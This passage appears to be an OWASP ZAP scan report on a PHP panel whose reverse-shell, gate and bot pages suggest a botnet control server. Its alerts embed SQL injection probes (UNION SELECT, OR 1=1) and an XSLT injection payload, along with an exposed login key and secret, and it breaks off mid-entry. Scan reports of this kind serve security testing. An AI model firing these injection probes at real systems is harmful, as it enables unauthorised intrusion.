URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW&username=RawPHP%2522%2529+AND+8723%253D8723%252516&password=%2527UNION+SELECT+NULL%252CNULL%252CNULL+--+-+--+-&secret=LNQ3Bj9ApCtipW5UD0Mh8tBChlT5x3xeXS7IAWL74FJPD4L1Cd
Method GET
Parameter
Attack
Evidence <script src="https://code.jquery.com/jquery-3.5.1.slim.min.js"></script>
Request Header - size: 1,173 bytes.
Request Body - size: 0 bytes.
Response Header - size: 219 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW&username=RawPHP%2522%2529+AND+8723%253D8723%252516&password=%2527UNION+SELECT+NULL%252CNULL%252CNULL+--+-+--+-&secret=LNQ3Bj9ApCtipW5UD0Mh8tBChlT5x3xeXS7IAWL74FJPD4L1Cd
Method GET
Parameter
Attack
Evidence <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script>
Request Header - size: 1,173 bytes.
Request Body - size: 0 bytes.
Response Header - size: 219 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&id=54
Method GET
Parameter
Attack
Evidence <link href="https://cdn.jsdelivr.net/npm/bootstrap/dist/css/bootstrap.min.css" rel="stylesheet">
Request Header - size: 741 bytes.
Request Body - size: 0 bytes.
Response Header - size: 366 bytes.
Response Body - size: 7,351 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&id=54
Method GET
Parameter
Attack
Evidence <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/css/all.min.css" rel="stylesheet">
Request Header - size: 741 bytes.
Request Body - size: 0 bytes.
Response Header - size: 366 bytes.
Response Body - size: 7,351 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54
Method GET
Parameter
Attack
Evidence <link href="https://cdn.jsdelivr.net/npm/bootstrap/dist/css/bootstrap.min.css" rel="stylesheet">
Request Header - size: 790 bytes.
Request Body - size: 0 bytes.
Response Header - size: 365 bytes.
Response Body - size: 7,351 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54
Method GET
Parameter
Attack
Evidence <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/css/all.min.css" rel="stylesheet">
Request Header - size: 790 bytes.
Request Body - size: 0 bytes.
Response Header - size: 365 bytes.
Response Body - size: 7,351 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method GET
Parameter
Attack
Evidence <link href="https://cdn.jsdelivr.net/npm/bootstrap/dist/css/bootstrap.min.css" rel="stylesheet">
Request Header - size: 543 bytes.
Request Body - size: 0 bytes.
Response Header - size: 367 bytes.
Response Body - size: 14,616 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method GET
Parameter
Attack
Evidence <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/css/all.min.css" rel="stylesheet">
Request Header - size: 543 bytes.
Request Body - size: 0 bytes.
Response Header - size: 367 bytes.
Response Body - size: 14,616 bytes.
Instances 26
Solution
Provide a valid integrity attribute to the tag.
Reference https://developer.mozilla.org/en-US/docs/Web/Security/Subresource_Integrity
Tags OWASP_2021_A05
OWASP_2017_A06
CWE Id 345
WASC Id 15
Plugin Id 90003
Medium
XSLT Injection
Description
Injection using XSL transformations may be possible, and may allow an attacker to read system information, read and write files, or execute arbitrary code.
URL http://142.202.242.172/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/Bots.php?id=54
Method GET
Parameter TQUIA729JAULAMJS
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
Request Header - size: 748 bytes.
Request Body - size: 0 bytes.
Response Header - size: 240 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/dashboard.php?id=54
Method GET
Parameter TQUIA729JAULAMJS
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
Request Header - size: 857 bytes.
Request Body - size: 0 bytes.
Response Header - size: 240 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/gate.php?bot=DESKTOP-95IQEEV
Method GET
Parameter TQUIA729JAULAMJS
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
Request Header - size: 659 bytes.
Request Body - size: 0 bytes.
Response Header - size: 240 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/login.php
Method GET
Parameter TQUIA729JAULAMJS
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
Request Header - size: 271 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/login.php/327qi
Method GET
Parameter TQUIA729JAULAMJS
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
Request Header - size: 277 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/login.php/327qi%20OR%201=1
Method GET
Parameter TQUIA729JAULAMJS
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
Request Header - size: 288 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/login.php/327qi%25'%20%20--
Method GET
Parameter TQUIA729JAULAMJS
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
Request Header - size: 475 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/login.php/327qi%25'%20%20--%20/Sound%20Effects
Method GET
Parameter TQUIA729JAULAMJS
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
Request Header - size: 494 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter TQUIA729JAULAMJS
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
Request Header - size: 397 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/login.php/327qi/Capture.PNG
Method GET
Parameter TQUIA729JAULAMJS
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
Request Header - size: 475 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/login.php/327qi/Sound%20Effects
Method GET
Parameter TQUIA729JAULAMJS
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
Request Header - size: 293 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/login.php/327qi/Sound%20Effects/error.wav
Method GET
Parameter TQUIA729JAULAMJS
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
Request Header - size: 489 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter TQUIA729JAULAMJS
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
Request Header - size: 799 bytes.
Request Body - size: 0 bytes.
Response Header - size: 240 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/Sound%20Effects/error.wav
Method GET
Parameter TQUIA729JAULAMJS
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
Request Header - size: 714 bytes.
Request Body - size: 0 bytes.
Response Header - size: 240 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/tasks_page.php
Method GET
Parameter TQUIA729JAULAMJS
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
Request Header - size: 509 bytes.
Request Body - size: 0 bytes.
Response Header - size: 240 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/tasks_page.php?id=54
Method GET
Parameter TQUIA729JAULAMJS
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
Request Header - size: 754 bytes.
Request Body - size: 0 bytes.
Response Header - size: 240 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E
Method GET
Parameter login.php
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
Request Header - size: 278 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E
Method GET
Parameter tasks_page.php
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
Request Header - size: 511 bytes.
Request Body - size: 0 bytes.
Response Header - size: 240 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/327qi
Method GET
Parameter login.php
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
Request Header - size: 284 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/327qi%20OR%201=1
Method GET
Parameter login.php
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
Request Header - size: 295 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/327qi%25'%20%20--
Method GET
Parameter login.php
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
Request Header - size: 482 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/327qi%25'%20%20--%20/Sound%20Effects
Method GET
Parameter login.php
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
Request Header - size: 501 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter login.php
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
Request Header - size: 404 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/327qi/Capture.PNG
Method GET
Parameter login.php
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
Request Header - size: 482 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/327qi/Sound%20Effects
Method GET
Parameter login.php
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
Request Header - size: 300 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/327qi/Sound%20Effects/error.wav
Method GET
Parameter login.php
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
Request Header - size: 496 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/error.wav
Method GET
Parameter Sound Effects
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
Request Header - size: 715 bytes.
Request Body - size: 0 bytes.
Response Header - size: 240 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E?bot=DESKTOP-95IQEEV
Method GET
Parameter gate.php
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
Request Header - size: 667 bytes.
Request Body - size: 0 bytes.
Response Header - size: 240 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E?id=54
Method GET
Parameter Bots.php
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
Request Header - size: 756 bytes.
Request Body - size: 0 bytes.
Response Header - size: 240 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E?id=54
Method GET
Parameter dashboard.php
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
Request Header - size: 860 bytes.
Request Body - size: 0 bytes.
Response Header - size: 240 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E?id=54
Method GET
Parameter tasks_page.php
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
Request Header - size: 756 bytes.
Request Body - size: 0 bytes.
Response Header - size: 240 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter login.php
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
Request Header - size: 806 bytes.
Request Body - size: 0 bytes.
Response Header - size: 240 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E
Method GET
Parameter 327qi
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
Request Header - size: 288 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/Sound%20Effects
Method GET
Parameter 327qi
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
Request Header - size: 490 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/Sound%20Effects/error.wav
Method GET
Parameter 327qi
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
Request Header - size: 500 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E
Method GET
Parameter Sound Effects
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
Request Header - size: 480 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/error.wav
Method GET
Parameter Sound Effects
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
Request Header - size: 490 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter host
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
Request Header - size: 386 bytes.
Request Body - size: 0 bytes.
Response Header - size: 206 bytes.
Response Body - size: 325 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E
Method GET
Parameter error.wav
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
Request Header - size: 496 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter host
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
Request Header - size: 788 bytes.
Request Body - size: 0 bytes.
Response Header - size: 206 bytes.
Response Body - size: 325 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method GET
Parameter host
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
Request Header - size: 743 bytes.
Request Body - size: 0 bytes.
Response Header - size: 206 bytes.
Response Body - size: 325 bytes.
URL http://142.202.242.172/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/login.php/327qi
Method POST
Parameter TQUIA729JAULAMJS
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
Request Header - size: 297 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/tasks_page.php
Method POST
Parameter TQUIA729JAULAMJS
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
Request Header - size: 529 bytes.
Request Body - size: 0 bytes.
Response Header - size: 240 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E
Method POST
Parameter tasks_page.php
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
Request Header - size: 531 bytes.
Request Body - size: 0 bytes.
Response Header - size: 240 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/327qi
Method POST
Parameter login.php
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
Request Header - size: 304 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
Instances 45
Solution
Sanitize and analyze every user input coming from any client-side.
Reference https://www.contextis.com/blog/xslt-server-side-injection-attacks
Tags OWASP_2021_A03
OWASP_2017_A01
CWE Id 91
WASC Id 23
Plugin Id 90017
Low
Big Redirect Detected (Potential Sensitive Information Leak)
Description
The server has responded with a redirect that seems to provide a large response. This may indicate that although the server sent a redirect it also responded with body content (which may include sensitive details, PII, etc.).
URL http://142.202.242.172/xampp
Method GET
Parameter
Attack
Evidence
Request Header - size: 194 bytes.
Request Body - size: 0 bytes.
Response Header - size: 234 bytes.
Response Body - size: 342 bytes.
Instances 1
Solution
Ensure that no sensitive information is leaked via redirect responses. Redirect responses should have almost no content.
Reference
Tags OWASP_2021_A04
WSTG-v42-INFO-05
OWASP_2017_A03
CWE Id 201
WASC Id 13
Plugin Id 10044
Low
Cookie No HttpOnly Flag
Description
A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php
Method GET
Parameter PHPSESSID
Attack
Evidence Set-Cookie: PHPSESSID
Request Header - size: 175 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi
Method GET
Parameter PHPSESSID
Attack
Evidence Set-Cookie: PHPSESSID
Request Header - size: 181 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Capture.PNG
Method GET
Parameter PHPSESSID
Attack
Evidence Set-Cookie: PHPSESSID
Request Header - size: 379 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects
Method GET
Parameter PHPSESSID
Attack
Evidence Set-Cookie: PHPSESSID
Request Header - size: 197 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects/error.wav
Method GET
Parameter PHPSESSID
Attack
Evidence Set-Cookie: PHPSESSID
Request Header - size: 393 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?password=ZAP&secret=&username=ZAP
Method GET
Parameter PHPSESSID
Attack
Evidence Set-Cookie: PHPSESSID
Request Header - size: 209 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter PHPSESSID
Attack
Evidence Set-Cookie: PHPSESSID
Request Header - size: 808 bytes.
Request Body - size: 113 bytes.
Response Header - size: 513 bytes.
Response Body - size: 0 bytes.
Instances 7
Solution
Ensure that the HttpOnly flag is set for all cookies.
Reference https://owasp.org/www-community/HttpOnly
Tags OWASP_2021_A05
WSTG-v42-SESS-02
OWASP_2017_A06
CWE Id 1004
WASC Id 13
Plugin Id 10010
Low
Cookie without SameSite Attribute
Description
A cookie has been set without the SameSite attribute, which means that the cookie can be sent as a result of a 'cross-site' request. The SameSite attribute is an effective counter measure to cross-site request forgery, cross-site script inclusion, and timing attacks.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php
Method GET
Parameter PHPSESSID
Attack
Evidence Set-Cookie: PHPSESSID
Request Header - size: 175 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi
Method GET
Parameter PHPSESSID
Attack
Evidence Set-Cookie: PHPSESSID
Request Header - size: 181 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Capture.PNG
Method GET
Parameter PHPSESSID
Attack
Evidence Set-Cookie: PHPSESSID
Request Header - size: 379 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects
Method GET
Parameter PHPSESSID
Attack
Evidence Set-Cookie: PHPSESSID
Request Header - size: 197 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects/error.wav
Method GET
Parameter PHPSESSID
Attack
Evidence Set-Cookie: PHPSESSID
Request Header - size: 393 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?password=ZAP&secret=&username=ZAP
Method GET
Parameter PHPSESSID
Attack
Evidence Set-Cookie: PHPSESSID
Request Header - size: 209 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter PHPSESSID
Attack
Evidence Set-Cookie: PHPSESSID
Request Header - size: 808 bytes.
Request Body - size: 113 bytes.
Response Header - size: 513 bytes.
Response Body - size: 0 bytes.
Instances 7
Solution
Ensure that the SameSite attribute is set to either 'lax' or ideally 'strict' for all cookies.
Reference https://tools.ietf.org/html/draft-ietf-httpbis-cookie-same-site
Tags OWASP_2021_A01
WSTG-v42-SESS-02
OWASP_2017_A05
CWE Id 1275
WASC Id 13
Plugin Id 10054
Low
Cross-Domain JavaScript Source File Inclusion
Description
The page includes one or more script files from a third-party domain.
URL http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=54
Method GET
Parameter https://cdn.jsdelivr.net/npm/chart.js
Attack
Evidence <script src="https://cdn.jsdelivr.net/npm/chart.js"></script>
Request Header - size: 646 bytes.
Request Body - size: 0 bytes.
Response Header - size: 366 bytes.
Response Body - size: 17,675 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter https://cdn.jsdelivr.net/npm/@popperjs/core@2.9.1/dist/umd/popper.min.js
Attack
Evidence <script src="https://cdn.jsdelivr.net/npm/@popperjs/core@2.9.1/dist/umd/popper.min.js"></script>
Request Header - size: 301 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter https://code.jquery.com/jquery-3.5.1.slim.min.js
Attack
Evidence <script src="https://code.jquery.com/jquery-3.5.1.slim.min.js"></script>
Request Header - size: 301 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js
Attack
Evidence <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script>
Request Header - size: 301 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
